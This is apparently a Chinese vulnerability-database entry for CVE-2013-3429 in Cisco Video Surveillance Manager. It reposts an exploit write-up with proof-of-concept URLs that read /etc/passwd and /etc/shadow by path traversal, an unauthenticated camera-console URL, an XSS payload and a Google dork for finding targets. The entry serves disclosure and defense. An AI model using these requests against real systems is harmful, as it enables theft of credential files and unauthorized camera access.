Cisco Video Surveillance Manager 目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121573 漏洞类型 路径遍历
发布时间 2013-03-15 更新时间 2013-07-24
CVE编号 CVE-2013-3429 CNNVD-ID CNNVD-201307-505
漏洞平台 JSP CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/24786
https://www.securityfocus.com/bid/61430
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201307-505
|漏洞详情
CiscoVideoSurveillanceManager(VSM)是美国思科(Cisco)公司的一套视频监视管理器软件。它提供了一个基于浏览器的用户界面,用于收集、管理、录制、归档和分类来自多个第三方视频编码器和IP摄像头的视频。CiscoVideoSurveillanceManager(VSM)6.3.3及之前的版本中存在多个目录遍历漏洞,这些漏洞源于程序没有过滤用户提交的输入。远程攻击者可通过使用特制的URL利用这些漏洞获得对敏感的系统文件的访问权限。
|漏洞EXP
# Exploit Title:Cisco Video Surveillance Operations Manager Multiple
vulnerabilities
# Google Dork: intitle:"Video Surveillance Operations Manager > Login"
# Date: 22 Feb 2013 reported to the vendor
# Exploit Author: Bassem | bassem.co
# Vendor Homepage: www.cisco.com
# Version: Version 6.3.2
# Tested on: Version 6.3.2


#1- The application is vulnerable to Local file inclusion

read_log.jsp and read_log.dep not validate the name and location of the log
file , un authenticated remote attacker can perform this

---------------------------------------------
read_log.jsp:
/usr/BWhttpd/root/htdocs/BWT/utils/logs
from /usr/BWhttpd/logs/<%= logName %>
---------------------------------------------
---------------------------------------------
read_log.dep

<%!
        protected LinkedList getBwhttpdLog( String logName, String theOrder
) {
                String logPath  = "/usr/BWhttpd/logs/";
                String theLog   = logPath + logName;
                LinkedList resultList = new LinkedList();
                try {
                                BufferedReader in = new BufferedReader(new
FileReader(theLog));
                                String theLine = "";
                                        while( (theLine = in.readLine()) !=
null ) {
                                                if(
theOrder.indexOf("descending") > -1 ) {

resultList.addFirst(theLine);
                                                } else {

resultList.addLast(theLine);
                                                }
                                        }
-----------------------------------------------
POC:

http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow

#####################################################################

#2- The application is vulnerable to local file inclusion

select and display log not validate the log file names , If attacker pass
/etc/passwd through the http post request system will display it as log
file

POC:

http://serverip/monitor/logselect.php


#####################################################################


#3  Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't
perform the proper authentication for the management and view console,
Remote attacker can gain access to the system and view the attached cameras
without authentication

POC:

http://serverip/broadware.jsp


#####################################################################


#4 Application is vulnerable to XSS

The web application doesn't perform validation for the inputs/outputs for
many of its pages so its vulnerable to XSS attacks

POC: http://serverip/vsom/index.php/
"/title><script>alert("ciscoxss");</script>




-- 
Best Regards
Bassem
|参考资料

来源:BID
名称:61430
链接:http://www.securityfocus.com/bid/61430
来源:CISCO
名称:20130724MultipleVulnerabilitiesintheCiscoVideoSurveillanceManager
链接:http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm